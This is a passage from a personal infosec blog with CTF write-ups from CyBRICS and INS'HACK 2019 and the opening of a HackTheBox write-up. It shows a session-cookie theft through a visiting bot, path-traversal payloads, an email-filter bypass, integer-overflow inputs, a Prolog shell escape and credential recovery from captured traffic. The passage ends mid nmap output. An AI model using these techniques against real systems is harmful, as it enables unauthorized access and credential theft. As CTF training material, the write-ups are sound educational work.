BoiteAKlou’s Infosec Blog

CyBRICS CTF Writeups

2019-07-21T08:00:00+00:00

Final rank: 112/775 with 7 challenges solved

[Web] Warmup
- Statement
- Resolution
[Web] Bitkoff Bank
- Statement
- Resolution
[Web] Caesaref
- Statement
- Resolution
[Network] Sender
- Statement
- Resolution
[Network] Paranoid
- Statement
- Resolution
[Misc] ProCTF
- Statement
- Resolution
[Stegano] Honey, Help!
- Statement
- Resolution

[Web] Warmup

Statement

Warmup (Web, Baby, 10 pts)

Author: George Zaytsev (groke)

E_TOO_EASY

Just get the flag

Resolution

When browsing to the link in the sentence, we were instantly redirected to /final.html, which displays a very long text but no flag.

Using Burpsuite, we could intercept the redirection and grab the flag lcoated in /index.html.

Once base64-decoded, we could read the following flag: cybrics{4b646c7985fec6189dadf8822955b034}.

[Web] Bitkoff Bank

Statement

Bitkoff Bank (Web, Easy, 50 pts)

Author: Alexander Menshchikov (n0str)

Need more money! Need the flag!

http://45.77.201.191/index.php

Mirror: http://95.179.148.72:8083/index.php

Resolution

I’m pretty sure I didn’t solve this challenge the intended way because my method was pretty dumb. Judge by yourself! :wink:

After registering an account, you were greeted with the following php page:

Everytime you clicked on “MINE BTC”, 0.0000000001 was added to your BTC counter. It was, then, possible to convert BTC to USD in order to buy the flag when you reached 1$.

An auto-miner costed 0.01$ and would click for you every second… not so worth it.

What I did is pretty simple: I’ve automated the mining request thanks to a python script and ran 6 instances of it in parallel until I got enough BTC to buy the flag. Absolutely nothing was optimized but I had a few other things to do so I’ve left the script run in background for approximately 2 hours and I could buy the flag!

import requests,re

payload = {'mine': '1'}
cook = {'name' : 'boiteaklou', 'password' : 'boiteaklou'}

while 1:
    r = requests.post('http://95.179.148.72:8083/index.php',data=payload,cookies=cook)
    btc = re.findall('Your BTC: <b>([^<]*)</b>',r.text)
    print("BTC: %s"%btc[0])

Here is the cheapest bitcoin mining farm ever:

A minor difficulty consisted in the fact that we could not enter a value lower than 0.0001 in the change field because of some HTML client-side check. However, we could forge the request using Burpsuite and it worked like a charm.

And the flag:

flag: cybrics{50_57R4n93_pR3c1510n}

[Web] Caesaref

Statement

Caesaref (Web, Hard, 50 pts)

Author: Alexander Menshchikov (n0str)

There is an additional one: Fixaref

This web resource is highly optimized:

http://45.77.218.242/

Resolution

After register a new account, we were greeted with the following web page where we could ask questions to the support:

At first, I lost a lot of time trying to redirect the support guy to my website via XSS payloads like <img src="http://mywebsite" />.

Actually, it was not necessary. We only had to paste an HTTP link in the text box and a bot would visit it instantly.

Using this information, we could paste the link to a webhook instance and surprisingly find the PHPSESSID cookie of the bot sent with the request.

Then, we could replace our own PHPSESSID cookie by the retrieved one and refresh the page in order to access the bot account. Once connected, a new button was here to give us the flag.

Flag: cybrics{k4Ch3_C4N_83_vuln3R48l3}

[Network] Sender

Statement

Sender (Network, Baby, 10 pts)

Author: Vlad Roskov (vos)

We’ve intercepted this text off the wire of some conspirator, but we have no idea what to do with that.

intercepted_text.txt

Get us their secret documents

Resolution

The given text file shows a SMTP trace from which we could extract some credentials as well as the password of an archive.

220 ugm.cybrics.net ESMTP Postfix (Ubuntu)
EHLO localhost
250-ugm.cybrics.net
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-AUTH PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH LOGIN
334 VXNlcm5hbWU6      
ZmF3a2Vz
334 UGFzc3dvcmQ6                        # Username
Q29tYmluNHQxb25YWFk=                    # Password
235 2.7.0 Authentication successful
MAIL FROM: <[email protected]>
250 2.1.0 Ok
RCPT TO: <[email protected]>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
From: fawkes <[email protected]>
To: Area51 <[email protected]>
Subject: add - archive pw
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0

=62=74=77=2E=0A=0A=70=61=73=73=77=6F=72=64 =66=6F=72 =74=68=65 =61=72=63=
=68=69=76=65 =77=69=74=68 =66=6C=61=67=3A =63=72=61=63=6B=30=57=65=73=74=
=6F=6E=38=38=76=65=72=74=65=62=72=61=0A=0A=63=68=65=65=72=73=21=0A
.
250 2.0.0 Ok: queued as C4D593E8B6
QUIT
221 2.0.0 Bye

Base64-decoded credentials: fawkes / Combin4t1onXXY

Mail content (quoted-printable decoded):

btw.

password for the archive with flag: crack0Weston88vertebra

cheers!

A NMAP scan showed us that the pop3 port (tcp 110) was open so we could connect to it and authentify ourselves using the retrieved credentials.

$ telnet ugm.cybrics.net 110
Trying 136.244.67.129...
Connected to ugm.cybrics.net.
Escape character is '^]'.
+OK Dovecot ready.
USER fawkes
+OK
PASS Combin4t1onXXY
+OK Logged in.
LIST
+OK 1 messages:
1 138808
.
+OK 138808 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by sender (Postfix, from userid 1000)
        id B83843EBFF; Thu, 18 Jul 2019 16:41:23 +0000 (UTC)
Date: Thu, 18 Jul 2019 16:41:23 +0000
From: fawkes <[email protected]>
To: Area51 <[email protected]>, fawkes <[email protected]>
Subject: interesting archive
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="J2SCkAp4GZ/dPZZf"
Content-Disposition: inline
User-Agent: Mutt/1.5.24 (2015-08-30)


--J2SCkAp4GZ/dPZZf
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

take a look. dont share. secret.

--J2SCkAp4GZ/dPZZf
Content-Type: application/zip
Content-Disposition: attachment; filename="secret_flag.zip"
Content-Transfer-Encoding: base64

UEsDBBQACQBjAMua8k6A+vIXUogBAA+iAQAPAAsAc2VjcmV0X2ZsYWcucGRmAZkHAAEAQUUD
CAC1GtwFWQRy7mwXUpknBhOJ3hpnDv1ei1Kf+knOhoW61yeyPdnML4vSrff+GUxQYCGKz6SB
[...]
AAAAAHNlY3JldF9mbGFnLnBkZgoAIAAAAAAAAQAYAGA6RPuEPdUBoKjPA4U91QGgqM8DhT3V           
AQGZBwABAEFFAwgAUEsFBgAAAAABAAEAbAAAAJqIAQAAAA==

--J2SCkAp4GZ/dPZZf--

Then, we could extract the content of the retrieved archive using the previously found password: 7z e -pcrack0Weston88vertebra archive.zip

And we could finally read the flag inside the extracted PDF: cybrics{Y0uV3_G0T_m41L}.

[Network] Paranoid

Statement

Paranoid (Network, Easy, 113 pts)

Author: Vlad Roskov (vos)

Added at 14:40 UTC: to save some guessing, flag is the current password. Flag format is still cybrics{…}, so you’ll know when you find it.

My neighbors are always very careful about their security. For example they’ve just bought a new home Wi-Fi router, and instead of just leaving it open, they instantly are setting passwords!

Don’t they trust me? I feel offended.

paranoid.zip

Can you give me their current router admin pw?

Resolution

The zip archive contained a pcap that I opened in Wireshark. Since the capture was quite big, I used Statistics > Protocol Hierarchy in order to get the big picture.

The packet capture was composed of 802.11 traffic and thanks to the protocol hierarchy, I could spot some HTTP requests.

As the statement was mentioning a password change, I decided to examine HTTP POST requests only thanks to the wireshark filter: http.request.method == "POST".

Inside the payload of HTTP POST request n°19173, we could find WLAN_AP_WEP_KEY1=Xi1nvy5KGSgI2&. Then, I added this wep key to wireshark decryption keys and it allowed us to find more HTTP requests.

Still filtering HTTP POST requests, I found a new password change request with this payload: WLAN_AP_WPA_PSK=2_RGR_xO-uiJFiAxdA33-PsdanuK& that I immediately set as WPA decryption key.

Once again, we had access to more decrypted HTTP traffic inside which the flag was located.

Flag: cybrics{n0_w4Y_7o_h1d3_fR0m_Y0_n316hb0R}

[Misc] ProCTF

Statement

ProCTF (CTB, Baby, 10 pts)

Author: Vlad Roskov (vos)

We Provide you a Login for your scientific researches. Don’t try to find the flag.

ssh [email protected] Password: iamthepr0

Resolution

After connecting to the machine via SSH, we were trapped inside a SWI-Prolog interactive interpreter. We could verify this assumption by pressing TAB twice, which would display the list of available functions.

$ ssh [email protected]
[email protected]\'s password:
Welcome to Ubuntu 19.04 (GNU/Linux 5.0.0-15-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 20 12:28:39 UTC 2019

  System load:                    4.15
  Usage of /:                     2.4% of 220.08GB
  Memory usage:                   10%
  Swap usage:                     0%
  Processes:                      508
  Users logged in:                3
  IP address for enp1s0:          95.179.148.72
  IP address for docker0:         172.17.0.1
  IP address for br-62bc0c6d2f97: 172.19.0.1


84 updates can be installed immediately.
48 of these updates are security updates.


WARNING: Your kernel does not support swap limit capabilities or the cgroup is not mounted. Memory limited without swap.
?-
abort                           built_in_procedure              current_output                  erf
abs                             busy                            cut                             erfc
access                          byte                            cut_call                        error
access_level                    c_stack                         cut_exit                        eval
acos                            call                            cut_parent                      evaluable
acosh                           call_continuation               cycle                           evaluation_error
active                          callable                        cycles                          event_hook
acyclic_term                    canceled                        cyclic_term                     exception
add_import                      case_insensitive                date                            exclusive
address                         case_preserving                 db_reference                    execute
... skipped 54 rows

After some googling, I found an easy way to get a shell and to display the flag:

?- shell('sh').
$
$ cd /home
$ ls
user
$ cd user
$ ls
flag.txt
$ cat flag.txt
cybrics{feeling_like_a_PRO?_that_sounds_LOGical_to_me!____g3t_it?_G37_1T?!?!_ok_N3v3Rm1nd...}

Flag: cybrics{feeling_like_a_PRO?_that_sounds_LOGical_to_me!____g3t_it?_G37_1T?!?!_ok_N3v3Rm1nd...}

[Stegano] Honey, Help!

Statement

Honey, Help! (rebyC, Baby, 10 pts)

Author: Vlad Roskov (vos)

Added at 10:50 UTC: there was a typo in the flag. Please re-submit.

HONEY HELP!!!

I was working in my Kali MATE, pressed something, AND EVERYTHING DISAPPEARED!

Resolution

This challenge was very easy but a bit painful for my eyes because I solved it late in the night.

The idea is to compare the clear and the encoded output in order to establish a match for each character.

Using this technique and a tiny bit of guessing (because it’s stega), I could build the following matching table and reconstruct the flag.

240C : c
< : y
2409 : b
23BC : r
240B : i
23BD : s
Pi : {
2424 : h
half-T : l
23BB : p
Cross : n
low T : w
|- : t
Pound : }
grey square : a

cybrics{h0ly_cr4p_1s_this_al13ni$h_0r_w4t?}

The CTF was pretty fun, thanks CyBRICS for the event!

BoiteAKlou :hammer:

INS’HACK CTF Writeups

2019-05-08T08:00:00+00:00

[Web] Exploring the universe
- Statement
- Resolution
[Web] Almost Tchap
- Statement
- Resolution
[Programming] HackCode-01/02
- Statement
  - Example
- Strategy
- Part 01
- Part 02
[Reverse] Dashlame
[Pwn] Intergover
- Statement
- Spotting the vulnerabilty
[Pwn] Signed or unsigned
- Statement
- Spotting the vulnerability

[Web] Exploring the universe

Statement

Will you be able to find the flag in the universe/ ?

I’ve been told that the guy who wrote this nice application called server.py is a huge fan of nano (yeah… he knows vim is better).

http://exploring-the-universe.ctf.insecurity-insa.fr/

Here is a screen capture of the website in question:

The page was quite empty apart from this funny JS game named “JSLander” where you had to land a rocket by controlling its speed and trajectory. Unfortunately, a successful landing gave no flag.

Resolution

A huge hint was given by the challenge statement about a file named server.py which would be edited by nano. After a few guesses, we managed to retrieve the file .server.py.swp automatically created by nano when the original file is being edited.

server.py:

from pathlib import Path
from mimetypes import guess_type
from aiohttp import web

ROOT = Path().resolve()
print(ROOT)
PUBLIC = ROOT.joinpath('public')

async def stream_file(request, filepath):
    '''Streams a regular file
    '''
    filepath = PUBLIC.joinpath(filepath).resolve()
    if filepath.is_dir():
        return web.Response(headers={'DT': 'DT_DIR'})
    if not filepath.is_file():
        raise web.HTTPNotFound(headers={'DT': 'DT_UNKNOWN'})
    try:
        filepath.relative_to(ROOT)
    except:
        raise web.HTTPForbidden(reason="You can't go beyond the universe...")
    mime, encoding = guess_type(str(filepath))
    headers = {
        'DT': 'DT_REG',
        'Content-Type': mime or 'application/octet-stream',
        'Content-Length': str(filepath.stat().st_size)
    }
    if encoding:
        headers['Content-Encoding'] = encoding
    resp = web.StreamResponse(headers=headers)
    await resp.prepare(request)
    with filepath.open('rb') as resource:
        while True:
            data = resource.read(4096)
            if not data: break
            await resp.write(data)
    return resp

async def handle_403(request):
    '''Stream 403 HTML file
    '''
    return await stream_file(request, '403.html')

async def handle_404(request):
    '''Stream 404 HTML file
    '''
    return await stream_file(request, '404.html')

def create_error_middleware(overrides):
    '''Create an error middleware for aiohttp
    '''
    @web.middleware
    async def error_middleware(request, handler):
        '''Handles specific web exceptions based on overrides
        '''
        try:
            response = await handler(request)
            override = overrides.get(response.status)
            if override:
                return await override(request)
            return response
        except web.HTTPException as ex:
            override = overrides.get(ex.status)
            if override:
                return await override(request)
            raise
    return error_middleware

def setup_error_middlewares(app):
    '''Setup error middleware on given application
    '''
    error_middleware = create_error_middleware({
        403: handle_403,
        404: handle_404
    })
    app.middlewares.append(error_middleware)

async def root(request):
    '''Web server root handler
    '''
    path = request.match_info['path']
    if not path:
        path = 'index.html'
    path = Path(path)
    print(f"client requested: {path}")
    return await stream_file(request, path)

def app():
    app = web.Application()
    setup_error_middlewares(app)
    app.add_routes([web.get(r'/{path:.*}', root)])
    web.run_app(app)

if __name__ == '__main__':
    app()

The stream_file function is not protected against directory path traversal so it allows us to exploit a Local File Inclusion vulnerability in order to read the file containing the flag.

Using ../ as a payload, it will be interpreted by our browser which will request the root of the webserver. That’s not what we want so we need to URL-encode our payload, such as: ../.

As suggested by the challenge statement, the flag file is stored in the universe/ folder. We can verify the LFI thanks to the following payload: ../universe.

The DT_DIR inside the response headers indicates that we are accessing an existing directory. Now, let’s retrieve the flag thanks to the following payload: ../universe/flag.

The flag is inside the downloaded file:

$ cat _universe_flag
INSA{3e508f6e93fb2b6de561d5277f2a9b26bc79c5f349c467a91dd12769232c1a29}

[Web] Almost Tchap

Statement

This is a message to all ATchap employees. Our new communication software is now in a beta mode. To register, just enter you email address, you’ll receive shortly the activation code.

https://atchap.ctf.insecurity-insa.fr

This challenge was in the era of time since it exploited a vulnerabilty found by @fs0c131y a few weeks ago inside the Tchap application.

Resolution

The website offers to register using an email address.

However, email addresses are filtered and only an address ending with @almosttchap.fr would be accepted.

Thanks to the footer of the website, it was easy to guess a valid email address, as you can see on the following picture:

Registering with the address [email protected] was authorized and we could then intercept the request with Burp in order to modify the submitted email address.

Actually, forging an email address in the following format will pass the filter and send the confirmation code to our personal address: [email protected]@[email protected].

For this challenge, I used a temporary email address provided by https://temp-mail.org/. Below, the screen capture of the request interception inside Burp:

After forwarding the modified request, the code has been sent to us.

INSA{1fd9fa56444a424d}

[Programming] HackCode-01/02

Statement

This challenge gives 4 flags of increasing difficulty.

This file contains 10 000 network routes. We want to have at least one network tap on each route. Find a list of routers to intercept, and keep the number of taps low ! You will get the first flag for any solution with at most 150 taps.

Example

If we have the following routes :

c,b,a
d,a,g
b,c,e
f,d,g

One solution could be :

g
b

The aim of this challenge was to find a minimum set of routers that covers all network routes inside routes.txt.

My strategy was very naive and only allowed me to reach the second flag of this challenge, but still, it was fun to do so I’ll share it here. If you want complete writeup of the 4 steps, I recommand you to read this one from Aperikube.

Strategy

This piece of pseudo-code will help you understanding my approach:

occurences_set = count_occurences_of_each_router()
solution = []
init_routes_coverage() // Tells which routes are already covered by a router

while not all routes are covered {
  foreach line of routes.txt{
    if (line is not already covered) {
        best_router = get_the_best_router_of_the_line(line) // The best in term of number of occurences
        solution.append(best_router)
    }
  }
}

Part 01

I wrote the following script, implementing the approach explained before, giving a solution of 141 routers. This was enough for the first flag!

def finished(coverage):
    for i in range(1,10001):
        if not coverage[i]:
            return False
    return True

def solution_covers(solution,line):
    for router in solution:
        if router in line:
            return True
    return False

def get_unique_routers_list():
    routers = []
    lines = open('routes.txt','r').readlines()
    for line in lines:
        splitted = line.strip().split(',')
        for router in splitted:
            if router not in routers:
                routers.append(router)
    #print(routers)
    print(str(len(routers))+" unique routers")
    return routers

def count_router_occurences(routers_list):
    occurences = {}
    f = open('routes.txt','r')
    lines = f.read()
    for router in routers_list:
        occurences[router] = lines.count(router)
    f.close()
    sorted_occurences = [(k, occurences[k]) for k in sorted(occurences, key=occurences.get, reverse=True)]
    return sorted_occurences

def get_best_router_of_line(router_occurences,routers_list):
    best_router = ('router',0)
    for router in routers_list:
        if router_occurences.get(router)>best_router[1]:
            best_router = (router,router_occurences.get(router))
    return best_router



if __name__ == "__main__":
    solution = []
    is_covered = {}

    unique_routers = get_unique_routers_list()
    router_occurences = count_router_occurences(unique_routers)

    #init is_covered
    for i in range(1,10001):
        is_covered[i] = False


    with open('routes.txt','r') as f:
        lines = f.readlines()
        while not finished(is_covered):
            i = 1
            for line in lines:
                splitted = line.strip().split(',')
                if not is_covered[i]:
                    if solution_covers(solution,line):
                        is_covered[i] = True
                    else:
                        best_score_of_line = get_best_router_of_line(dict(router_occurences),splitted)
                        print('Adding '+best_score_of_line[0]+' for line: '+str(i))
                        solution.append(best_score_of_line[0])
                        is_covered[i] = True
                i += 1
    f.close()

    print("Solution size: "+str(len(solution)))
    for router in solution:
        print(router)

The first flag is INSA{N0t_bad_f0r_a_start}. The next flag will be awarded at <= 135.

Part 02

The second flag required a solution containing at most 135 routers. In order to get the 4 flags, I had to completely change of strategy but I hadn’t so much time left and wanted to work on other challenges so I did something very dirty.

Pre-filling my solution array with certain routers would sometimes give better solutions than my previous script. Guess what, I did that until having a 135 routers solution. Pretty lame I agree…

Here is the modification I brought to script of part 1:

BEFORE:
solution = []

AFTER:
solution = ['100284b7','57e483e5','326ceb8a','9793198c','5cc167e0','85ea0d43']

And here I am with my 135 routers solution!

INSA{135_is_pretty_g0Od_but_how_l0w_c4n_u_gO}. Get your next flag at <= 128

[Reverse] Dashlame

Statement

Can you try our new password manager ? There’s a free flag in every password archive created !

This challenge contains a second part in the Crypto category.

Uncompyle

As indicated by file, the given file is actually some compiled python bytecode.

$ file dashlame.pyc
dashlame.pyc: python 2.7 byte-compiled

Luckily, it is trivial to recover the source code from python bytecode. I used uncompyle for this:

$ uncompyle2 -o dashlame.py dashlame.pyc
$ file dashlame.py
dashlame.py: Python script, ASCII text executable, with very long lines

Understanding the script

The script defines the following functions:

$ grep def dashlame.py
def pad(s):
def unpad(s):
def get_random_passphrase():
def get_pearson_hash(passphrase):
def encrypt_stream(data, passphrase):
def decrypt_stream(data, passphrase):
def encrypt_archive(archive_filename, passphraseA, passphraseB):
def decrypt_archive(archive_filename, passphraseA, passphraseB):
def createArchive():
def updateArchive():
def accessArchive():

We see nothing strange for a password manager. Let’s dig into the createArchive() function since the challenge statement mentions a flag in every password archive created.

def createArchive():
    archive_name = raw_input('Please enter your archive name: ')
    passphraseA, passphraseB = get_random_passphrase()
    print 'This is your passphrase :', passphraseA, passphraseB
    print 'Please remember it or you will lose all your passwords.'
    archive_filename = archive_name + '.db'
    with open(archive_filename, 'wb') as db_fd:
        db_fd.write(zlib.decompress('x\x9c\x0b\x0e\xf4\xc9,IUH\xcb/\xcaM,Q0f`a`ddpPP````\x82b\x18`\x04b\x164>!\xc0\xc4\xa0\xfb\x8c\x9b\x17\xa4\x98y.\x03\x10\x8d\x82Q0\n\x88\x05\x89\x8c\xec\xe2\xf2\xf2\x8c\x8d\x82%\x89I9\xa9\x01\x89\xc5\xc5\xe5\xf9E)\xc5p\x06\x93s\x90\xabc\x88\xabB\x88\xa3\x93\x8f\xab\x02\\X\xa3<5\xa9\x18\x94\xabC\\#Bt\x14J\x8bS\x8b\xf2\x12sa\xdc\x02\xa820W\x13\x927\xcf0\x00\xd1(\x18\x05\xa3`\x08\x03#F\x16mYkh\xe6\x8fO\xadH\xcc-\xc8I\x85\xe5~O\xbf`\xc7\xea\x90\xcc\xe2\xf8\xa4\xd0\x92\xf8\xc4\xf8`\xe7"\x93\x92\xe4\x8cZ\x00\xa8&=\x8f'))
    encrypt_archive(archive_filename, passphraseA, passphraseB)
    print 'Archive created successfully.'

We can see the content of the password archive stored unencrypted inside the script.

Resolution

Since the archive content is written in zlib-compressed plaintext inside the script, we can simply decompress it and print the output in order to get the content of the password archive.

$ python
Python 2.7.15+ (default, Nov 28 2018, 16:27:22)
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.                                                                 
>>> import zlib
>>> print zlib.decompress('x\x9c\x0b\x0e\xf4\xc9,IUH\xcb/\xcaM,Q0f`a`ddpPP````\x82b\x18`\x04b\x164>!\xc0\xc4\xa0\xfb\x8c\x9b\x17\xa4\x98y.\x03\x10\x8d\x82Q0\n\x88\x05\x89\x8c\xec\xe2\xf2\xf2\x8c\x8d\x82%\x89I9\xa9\x01\x89\xc5\xc5\xe5\xf9E)\xc5p\x06\x93s\x90\xabc\x88\xabB\x88\xa3\x93\x8f\xab\x02\\X\xa3<5\xa9\x18\x94\xabC\\#Bt\x14J\x8bS\x8b\xf2\x12sa\xdc\x02\xa820W\x13\x927\xcf0\x00\xd1(\x18\x05\xa3`\x08\x03#F\x16mYkh\xe6\x8fO\xadH\xcc-\xc8I\x85\xe5~O\xbf`\xc7\xea\x90\xcc\xe2\xf8\xa4\xd0\x92\xf8\xc4\xf8`\xe7"\x93\x92\xe4\x8cZ\x00\xa8&=\x8f')
SQLite format 3@  -
2+;website_exampleusernameINSA{Tis_bUt_a_SCr4tch}bsite TEXT, username TEXT, password TEXT)

Flag: INSA{Tis_bUt_a_SCr4tch}.

Alternative way using decrypt_archive()

While listing the script functions, we could see a decrypt_archive() function. However, this function was not available from the user interface of the program.

$ python dashlame.py
      /.m.\
     /.mnnm.\                                              ___
    |.mmnvvnm.\.                                     .,,,/`mmm.\
    |.mmnnvvnm.\:;,.                           ..,,;;;/.mmnnnmm.\
    \ mmnnnvvnm.\::;;,                    .,;;;;;;;;/.mmmnnvvnnm.|
     \`mmnnnvvnm.\::;::.sSSs      sSSs ,;;;;;;;;;;/.mmmnnvvvnnmm'/
       \`mmnnnvnm.\:::::SSSS,,,,,,SSSS:::::::;;;/.mmmnnvvvnnmmm'/
          \`mnvvnm.\::%%%;;;;;;;;;;;%%%%:::::;/.mnnvvvvnnmmmmm'/
             \`mmmm.%%;;;;;%%%%%%%%%%%%%%%::/.mnnvvvnnmmmmm'/ '
                \`%%;;;;%%%%s&&&&&&&&&s%%%%mmmnnnmmmmmm'/ '
     |           `%;;;%%%%s&&.%%%%%%.%&&%mmmmmmmmmm'/ '
\    |    /       %;;%%%%&&.%;`    '%.&&%%%////// '
  \  |  /         %%%%%%s&.%%   x   %.&&%%%%%//%
    \  .:::::.  ,;%%%%s&&&&.%;     ;.&&%%%%%%%%/,
-!!!- ::#:::::%%%%%%s&&&&&&&&&&&&&&&&&%%%%%%%%%%%
    / :##:::::&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%,
  /  | `:#:::&&&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%
     |       `&&&&&&&&&,&&&&&&&&&&&&SS%%%%%%%%%%%%%
               `~~~~~'~~        SSSSSSS%%%%%%%%%%%%%
                               SSSSSSSS%%%%%%%%%%%%%%
                              SSSSSSSSSS%%%%%%%%%%%%%.
                            SSSSSSSSSSSS%%%%%%%%%%%%%%
                          SSSSSSSSSSSSS%%%%%%%%%%%%%%%.
                        SSSSSSSSSSSSSSS%%%%%%%%%%%%%%%%
                      SSSSSSSSSSSSSSSS%%%%%%%%%%%%%%%%%.
                    SSSSSSSSSSSSSSSSS%%%%%%%%%%%%%%%%%%%
                  SSSSSSSSSSSSSSSSSS%%%%%%%%%%%%%%%%%%%%.

                          WELCOME TO DASHLAME

1. Create a new password archive
2. Add a password to an archive
3. Access a password from an existing archive

An alternative way of decrypting an archive would be to:

Create a password archive.
Note passphraseA and passphraseB.
Modify the script in order to call decrypt_archive(archive,passphraseA,passphraseB).

                      WELCOME TO DASHLAME

1. Create a new password archive
2. Add a password to an archive
3. Access a password from an existing archive
1
Please enter your archive name: boiteaklou
Getting random data from atmospheric noise and mouse movements..........                                                               
This is your passphrase : pruden patties
Please remember it or you will lose all your passwords.
Archive created successfully.

Here is the slight modification I brought to the main function of the script:

if __name__ == '__main__':
    print HEADER
    print '1. Create a new password archive'
    print '2. Add a password to an archive'
    print '3. Access a password from an existing archive'
    try:
        res = raw_input()
        if res == '1':
            createArchive()
        elif res == '2':
            updateArchive()
        elif res == '3':
            accessArchive()
        elif res == '4':
            decrypt_archive('boiteaklou.dla','pruden','patties') # HERE
        else:
            print 'Wrong choice'
    except:
        print 'Error.'

Now, the password archive should be decrypted:

$ strings boiteaklou.db
SQLite format 3
tablePasswordsPasswords
CREATE TABLE Passwords(website TEXT, username TEXT, password TEXT)
;website_exampleusernameINSA{Tis_bUt_a_SCr4tch}

[Pwn] Intergover

Statement

I hope you know how integers are stored.

ssh -i <your_keyfile> -p 2223 [email protected] To find your keyfile, look into your profile on this website.

Binary

https://www.youtube.com/watch?v=_BgblvF90UE

Spotting the vulnerabilty

Let’s see what we can get from this binary.

$ file intergover
intergover: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8a1089cd9d189ee37904eaf6edfb3ce59652a881, not stripped

Ok, it’s a 64-bit executable, not stripped. We can quickly reverse-engineer the binary in order to get a fine understanding of its behavior.

Here is the pseudo-code generated by IDA Pro:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+1Bh] [rbp-15h]
  int v5; // [rsp+1Ch] [rbp-14h]
  int i; // [rsp+20h] [rbp-10h]
  int v7; // [rsp+24h] [rbp-Ch]
  unsigned __int64 v8; // [rsp+28h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  printf("Give me one param: ", argv, envp, argv);
  fflush(0LL);
  v7 = __isoc99_scanf("%d", &v5);
  if ( v7 != 1 )
  {
    puts("I expect a number.");
    fflush(0LL);
  }
  v4 = 0;
  for ( i = 0; i < v5; ++i )
    ++v4;
  if ( v4 == -14 )
  {
    gimmeFlagPliz();
  }
  else
  {
    printf("No, I can't give you the flag: %d\n", (unsigned int)v4);
    fflush(0LL);
  }
  return 0;
}

We can see that our input is stored in an unsigned 64-bit int (v5). As indicated by the file limits.h, this type of variable can hold values between 0 and 4,294,967,295. Then, a signed 64-bit int is incremented until reaching the value we submitted. 64-bit signed integers can hold value between −2,147,483,648 and +2,147,483,647.

The for loop forces us to submit a positive integer, at least when this one is unsigned.

Let me explain. The following byte: 1111 1111 will be seen as 255 in the unsigned world and as -1 in the signed world. So if we submit 2147483647, the program should return -1 because 2147483647 (unsigned) == 1111111111111111111111111111111 (binary) == -1 (signed).

Let’s verify this:

$ ./intergover
Give me one param: 2147483647
No, I can't give you the flag: -1

Great! The pseudo-code taught us that v4 had to be equal to -14 in order to call gimmeFlagPliz(), so all we have to do is to submit (2147483647-13) == 2147483634 and to grab the flag!

$ ssh -i ssh_inshack -p 2223 [email protected]
Warning: Permanently added the ECDSA host key for IP address '[XX.XX.XX.XXX]:2223' to the list of known hosts.
 ___           _   _            _      ____   ___  _  ___
|_ _|_ __  ___| | | | __ _  ___| | __ |___ \ / _ \/ |/ _ \
| || '_ \/ __| |_| |/ _` |/ __| |/ /   __) | | | | | (_) |
| || | | \__ \  _  | (_| | (__|   <   / __/| |_| | |\__, |
|___|_| |_|___/_| |_|\__,_|\___|_|\_\ |_____|\___/|_|  /_/

===========================================================

      You are accessing a sandbox challenge over SSH
        This sandbox will be killed soon enough.
       Please wait while we launch your sandbox...

===========================================================

Give me one param: 2147483634
INSA{B3_v3rY_c4r3fUL_w1tH_uR_1nt3g3r_bR0}
Connection to intergover.ctf.insecurity-insa.fr closed.

[Pwn] Signed or unsigned

Statement

Signed or not signed, this is the question :) Binary

ssh -i <your_keyfile> -p 2228 [email protected] To find your keyfile, look into your profile on this website.

https://www.youtube.com/watch?v=inXC_lab-34

Spotting the vulnerability

As this challenge is in the same vein as the previous one, I’ll go straight to the solution.

We have a 64-bit ELF which can be translated in the following pseudo-code:

If the user input is inferior to 10, we call the vuln() function.

The user input is stored in a signed integer so we can submit -666 directly and get the flag.

$ ssh -i ssh_inshack -p 2228 [email protected]

 ___           _   _            _      ____   ___  _  ___
|_ _|_ __  ___| | | | __ _  ___| | __ |___ \ / _ \/ |/ _ \
| || '_ \/ __| |_| |/ _` |/ __| |/ /   __) | | | | | (_) |
| || | | \__ \  _  | (_| | (__|   <   / __/| |_| | |\__, |
|___|_| |_|___/_| |_|\__,_|\___|_|\_\ |_____|\___/|_|  /_/

===========================================================

      You are accessing a sandbox challenge over SSH
        This sandbox will be killed soon enough.
       Please wait while we launch your sandbox...

===========================================================
Please give me a number:-666
INSA{Th3_qU3sTi0n_1s_S1gN3d_0r_x90}
Connection to signed-or-not-signed.ctf.insecurity-insa.fr closed.

Not too much difficulty in this one but well it’s still a flag :)

BoiteAKlou :hammer:

HackTheBox: Carrier writeup

2019-03-16T21:00:00+00:00

Carrier was a very interesting box where a web command injection gave access to a BGP router. After some BGP Hijacking magic, it was possible to retrieve the FTP credentials of a rich Nigerian Prince, which allowed us to read the flag stored on this FTP server…

Initial Foothold And User Access
Privilege escalation
Final words

Initial Foothold And User Access

Recon

The initial nmap scan revealed an Apache web server on port 80 and an SSH server on port 22.

$ nmap -sC -sV -vvv 10.10.10.105
[...]
PORT   STATE    SERVICE REASON      VERSION
21/tcp filtered ftp     no-response
22/tcp open     ssh     syn-ack     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDI2Jfx6VeMU2wFDys5YoSIVCu4U626/VDawUrXKa5SR+D8HaNvt6QFECtQumoFcYzxD7Jnd3PKw/dXTXvePTPnolDUNV3oim
